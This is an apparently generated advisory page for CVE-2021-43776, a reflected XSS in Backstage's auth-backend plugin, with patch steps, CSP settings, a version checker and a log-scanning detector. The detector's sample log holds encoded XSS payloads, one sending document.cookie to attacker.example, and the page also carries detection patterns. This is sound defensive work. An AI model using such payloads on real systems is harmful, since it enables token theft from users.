CVE-2021-43776

7.4 HIGH

📋 TL;DR

This reflected Cross-Site Scripting (XSS) vulnerability in Backstage's auth-backend plugin lets an attacker craft a URL that, when opened by a logged-in user, runs attacker-controlled JavaScript in that user's browser. The script can exfiltrate the user's access token and other secrets the browser holds. The Content Security Policy (CSP) that the Backstage backend ships by default blocks the injected script, so the deployments at risk are those running an affected version with CSP disabled or relaxed.

💻 Affected Systems

Products:
  • Backstage auth-backend plugin
Versions: @backstage/plugin-auth-backend before 0.4.9 (0.4.8 and earlier)
Operating Systems: All
Default Config Vulnerable: ✅ No
Notes: The default CSP shipped with the Backstage backend stops the injected script from executing, so a stock deployment is not exploitable. Deployments that disable CSP (for example to work around compatibility problems) or that loosen the script-src directive are exploitable.

📦 What is this software?

Backstage is an open-source framework for building internal developer portals, created at Spotify and now hosted by the CNCF. The auth-backend plugin (@backstage/plugin-auth-backend) implements the backend half of Backstage sign-in: it drives the OAuth/OIDC flows with identity providers and issues the Backstage identity tokens the frontend then presents to other plugins.

⚠️ Risk & Real-World Impact

🔴

Worst Case

An attacker lures an administrator or other highly privileged user to the crafted URL and steals that user's tokens, gaining that user's level of control over the Backstage instance and, through the tokens the portal holds for integrations, access to connected systems and secrets.

🟠

Likely Case

Attackers steal user access tokens, enabling unauthorized access to Backstage resources and potentially compromising developer portal data.

🟢

If Mitigated

With the default CSP in place, the injection still reaches the page, but the browser refuses to execute the injected script because the policy's script-src does not permit inline script, so the attack fails.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

The attacker needs no Backstage account; the victim must be a logged-in user who opens an attacker-supplied link, and the deployment must have CSP disabled or relaxed. Once those conditions hold, exploitation is ordinary reflected XSS with no further obstacles.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 0.4.9

Vendor Advisory: https://github.com/backstage/backstage/security/advisories/GHSA-w7fj-336r-vw49

Restart Required: Yes

Instructions:

1. Update @backstage/plugin-auth-backend to version 0.4.9 or later in the package that depends on it (normally packages/backend/package.json).
2. Bump the version in package.json and reinstall with your package manager (Backstage projects typically use yarn), or run 'yarn backstage-cli versions:bump' or 'npm update @backstage/plugin-auth-backend'. Check the lockfile afterwards: a nested copy of the plugin pulled in by another package must also be at 0.4.9 or later.
3. Restart Backstage services.

🔧 Temporary Workarounds

Enable Content Security Policy

Applies to: all platforms

Keep the backend's CSP enabled (it is on by default) and make sure the effective script-src directive contains neither 'unsafe-inline', a wildcard, nor a bare scheme source, so that injected inline script and attacker-hosted script sources are refused by the browser.

Configure CSP through the backend.csp section of app-config.yaml rather than disabling it. If a reverse proxy in front of Backstage sets its own Content-Security-Policy header, make sure that header is at least as strict, since the browser enforces whichever policy it receives.
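The two settings side by side in app-config.yaml, as an added example that is not from the advisory or the Backstage project. It assumes the standard backend.csp key that the Backstage backend reads when it builds its Content-Security-Policy header; the directive values in the corrected document are illustrative, not Backstage's exact defaults:

```yaml
# app-config.yaml, illustrative excerpt (added example, not Backstage's shipped defaults).
# Assumes the standard `backend.csp` key that the Backstage backend reads when it
# builds the Content-Security-Policy header.

# Weak: this removes the CSP header altogether. With plugin-auth-backend < 0.4.9
# the injected script runs, and the mitigation the advisory relies on is gone.
backend:
  csp: false
---
# Corrected: keep CSP on and pin script-src to the app's own origin. The directive
# values here are illustrative; what matters is that script-src carries neither
# 'unsafe-inline' nor '*' nor a bare scheme such as https:. 'unsafe-eval' (which
# Backstage's default policy includes for the frontend) does not permit injected
# inline script, so it can stay if your frontend needs it.
backend:
  csp:
    script-src: ["'self'", "'unsafe-eval'"]
    connect-src: ["'self'", 'http:', 'https:']
    img-src: ["'self'", 'data:']
```

Setting backend.csp to false is the configuration the advisory warns about; deleting the key restores the backend's built-in policy, which is the simplest correct fix when no custom directives are needed.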

🧯 If You Can't Patch

  • Keep CSP enabled with a strict script-src; this is the control the advisory itself relies on, and it is what makes the default configuration safe
  • Do not count on validating or sanitizing URLs in front of the plugin: the unsafe reflection happens inside the auth-backend's own response handling, so a proxy-side filter can only catch payload patterns it already knows. Reduce exposure instead by restricting who can reach the instance (VPN or identity-aware proxy), which is why the internal-only rating above is lower

🔍 How to Verify

Check if Vulnerable:

Check the version of @backstage/plugin-auth-backend that is actually installed (the resolved version in the lockfile, including any nested copies, not just the range in package.json). If any copy is older than 0.4.9 and the backend's Content-Security-Policy header is absent or permits inline script, the system is exploitable.

Check Version:

npm list @backstage/plugin-auth-backend

Verify Fix Applied:

Confirm that every installed copy of @backstage/plugin-auth-backend is 0.4.9 or later, then request a page from the backend and confirm that the Content-Security-Policy response header is present and that its script-src (or the default-src fallback) does not include 'unsafe-inline', a wildcard, or a bare scheme source.
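An added check in JavaScript (Node) that is not part of the advisory or of Backstage. It assumes the JSON tree printed by 'npm ls @backstage/plugin-auth-backend --json' and a raw Content-Security-Policy header captured from the backend; the sample tree and header at the bottom are constructed for the demonstration. It goes a step beyond the text by walking the whole dependency tree, because a nested copy of the plugin can stay at an old version after the top-level one is bumped:

```javascript
// Added verification helper; not part of Backstage or the advisory.
// Assumptions: `npm ls @backstage/plugin-auth-backend --json` prints a tree of
// { dependencies: { <name>: { version, dependencies } } }, and the CSP header
// is the raw Content-Security-Policy value sent by the Backstage backend.

const PACKAGE = '@backstage/plugin-auth-backend';
const FIXED_VERSION = '0.4.9';

// Numeric dotted-version comparator (<0, 0, >0). Range prefixes and pre-release
// suffixes such as "-next.0" are dropped; good enough for a patched/unpatched split.
function compareVersions(a, b) {
  const num = v => v.replace(/^[v^~]/, '').split('-')[0].split('.').map(Number);
  const pa = num(a), pb = num(b);
  for (let i = 0; i < Math.max(pa.length, pb.length); i++) {
    const d = (pa[i] || 0) - (pb[i] || 0);
    if (d !== 0) return d;
  }
  return 0;
}

function isVulnerableVersion(version) {
  return compareVersions(version, FIXED_VERSION) < 0;
}

// Walk the whole npm ls tree: a nested copy of the plugin pulled in by another
// package can stay at an old version after the top-level one is bumped.
function findPackageVersions(tree, name = PACKAGE, found = new Set()) {
  const deps = (tree && tree.dependencies) || {};
  for (const [depName, info] of Object.entries(deps)) {
    if (depName === name && info.version) found.add(info.version);
    findPackageVersions(info, name, found);
  }
  return [...found];
}

// Parse a CSP header into { directive: [source, ...] }, lower-cased.
function parseCsp(header) {
  const directives = {};
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    directives[tokens[0].toLowerCase()] = tokens.slice(1).map(t => t.toLowerCase());
  }
  return directives;
}

// Would this policy stop an injected <script>? Inline script is governed by
// script-src (falling back to default-src). 'unsafe-inline' permits it unless a
// nonce or hash source is also present (browsers then ignore 'unsafe-inline');
// '*' or a bare scheme source lets the attacker load script from a host they
// control. 'unsafe-eval' is NOT a problem here: it does not permit inline script.
const PERMISSIVE_SOURCES = new Set(['*', 'http:', 'https:', 'data:']);

function cspBlocksInlineScript(header) {
  if (!header) return false;                       // no header at all
  const csp = parseCsp(header);
  const src = csp['script-src'] || csp['default-src'];
  if (!src) return false;                          // nothing restricts script
  if (src.some(s => PERMISSIVE_SOURCES.has(s))) return false;
  if (src.includes("'unsafe-inline'")) {
    return src.some(s => /^'(nonce|sha(256|384|512))-/.test(s));
  }
  return true;
}

function assessDeployment({ npmLsJson, cspHeader }) {
  const versions = findPackageVersions(npmLsJson);
  const vulnerableVersions = versions.filter(isVulnerableVersion);
  const cspOk = cspBlocksInlineScript(cspHeader);
  let verdict = 'patched';
  if (vulnerableVersions.length > 0) {
    verdict = cspOk ? 'vulnerable version, mitigated by CSP' : 'exploitable';
  }
  return { versions, vulnerableVersions, cspOk, verdict };
}

// Constructed sample inputs: a tree where the top-level plugin is fixed but a
// nested copy is not, and a header with a relaxed script-src.
const SAMPLE_NPM_LS = {
  dependencies: {
    '@backstage/plugin-auth-backend': { version: '0.4.9' },
    'internal-auth-provider': {
      version: '1.2.0',
      dependencies: { '@backstage/plugin-auth-backend': { version: '0.4.8' } },
    },
  },
};
const SAMPLE_CSP = "default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; img-src 'self' data:";

console.log(JSON.stringify(assessDeployment({ npmLsJson: SAMPLE_NPM_LS, cspHeader: SAMPLE_CSP }), null, 2));
```

Feed it the real 'npm ls' output and the header from a 'curl -sI' against the backend; the sample tree above reports "exploitable" because the nested 0.4.8 copy is old and the header allows inline script.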

📡 Detection & Monitoring

Log Indicators:

  • Requests to the auth-backend's routes (under /api/auth/ in a standard deployment) whose path or query contains HTML or script fragments, in plain or percent-encoded form (<script, javascript:, onerror=)
  • A user's Backstage token being presented from a new IP address or user agent shortly after that user opened such a URL
  • Sign-in activity for a user that does not line up with that user's normal working pattern following a visit to an auth-backend URL from an external referrer

Network Indicators:

  • Requests to /api/auth/* carrying encoded markup or script, typically arriving from an external source address
  • Connections from users' browsers to unfamiliar external hosts immediately after such a request, which is how a stolen token leaves the browser

SIEM Query:

source="backstage" AND url="*/api/auth/*" AND (url="*javascript:*" OR url="*javascript%3A*" OR url="*<script*" OR url="*%3Cscript*" OR url="*onerror=*" OR url="*onerror%3D*")
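An added example of the detection logic in JavaScript (Node), not from the advisory or from Backstage, run over constructed access-log lines in combined format. It assumes the auth-backend is mounted under /api/auth/ (the standard Backstage backend prefix) and that the proxy logs the request path as received, still percent-encoded; where the payload sits in the constructed URLs is illustrative, not the advisory's actual injection point. Unlike a wildcard string match in a SIEM query, it percent-decodes repeatedly before matching, so double-encoded payloads are caught:

```javascript
// Added detection example; not from the advisory or Backstage. Assumptions:
// combined-format access logs from the reverse proxy in front of Backstage,
// the auth-backend mounted under /api/auth/ (standard Backstage prefix), and
// the proxy logging the request path as received, i.e. still percent-encoded.

const AUTH_PREFIX = '/api/auth/';

// Fragments that never belong in a legitimate auth-backend URL. They are
// matched against the DECODED URL, so %3Cscript and <script both hit.
const SCRIPT_MARKERS = [
  /<script/i,            // classic script injection
  /javascript:/i,        // javascript: URL in an href/src
  /[\s"']on[a-z]+\s*=/i, // inline event handler, e.g. <img src=x onerror=...>
  /<\/?(svg|img|iframe|object|embed)\b/i,
];

// Percent-decode up to three times: double encoding (%253C -> %3C -> <) is the
// standard trick for dodging a single-pass decoder or a literal-match query.
function safeDecode(value) {
  let current = value;
  for (let i = 0; i < 3; i++) {
    let next;
    try {
      next = decodeURIComponent(current);
    } catch (e) {
      break;                                       // malformed escape, keep what we have
    }
    if (next === current) break;
    current = next;
  }
  return current;
}

// Minimal combined-log parser: client IP, timestamp, method, URL, status.
const LOG_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})/;

function parseLine(line) {
  const m = LOG_RE.exec(line);
  if (!m) return null;
  return { ip: m[1], ts: m[2], method: m[3], url: m[4], status: Number(m[5]) };
}

// Return one hit per suspicious request to the auth-backend.
function scanAuthLogs(lines) {
  const hits = [];
  for (const line of lines) {
    const ev = parseLine(line);
    if (!ev || !ev.url.startsWith(AUTH_PREFIX)) continue;
    const decoded = safeDecode(ev.url);
    const matched = SCRIPT_MARKERS.filter(re => re.test(decoded)).map(re => re.source);
    if (matched.length > 0) hits.push({ ip: ev.ip, ts: ev.ts, url: ev.url, decoded, matched });
  }
  return hits;
}

// Constructed sample log. Line 1 is a normal sign-in start; lines 2 and 3 carry
// a single- and a double-encoded payload; line 4 is outside the auth routes.
const SAMPLE_LOG = [
  '10.0.0.5 - - [10/Dec/2021:10:00:01 +0000] "GET /api/auth/github/start?env=development HTTP/1.1" 302 0',
  '203.0.113.7 - - [10/Dec/2021:10:00:07 +0000] "GET /api/auth/%3Cscript%3Efetch(%27https://attacker.example/%27%2Bdocument.cookie)%3C/script%3E/start HTTP/1.1" 200 512',
  '203.0.113.7 - - [10/Dec/2021:10:00:09 +0000] "GET /api/auth/%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E HTTP/1.1" 404 120',
  '10.0.0.9 - - [10/Dec/2021:10:01:00 +0000] "GET /api/catalog/entities?filter=kind=component HTTP/1.1" 200 9040',
];

for (const hit of scanAuthLogs(SAMPLE_LOG)) {
  console.log(`${hit.ts} ${hit.ip} ${hit.matched.join(',')} ${hit.decoded}`);
}
```

Pipe real proxy logs into scanAuthLogs one line at a time; the two hits from the sample come from the same source address within seconds, which is the pattern worth alerting on, and a 404 on the second does not make it harmless, since the page that reflected the payload may have been served earlier.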

🔗 References

  • GitHub Security Advisory GHSA-w7fj-336r-vw49: https://github.com/backstage/backstage/security/advisories/GHSA-w7fj-336r-vw49
  • NVD entry for CVE-2021-43776: https://nvd.nist.gov/vuln/detail/CVE-2021-43776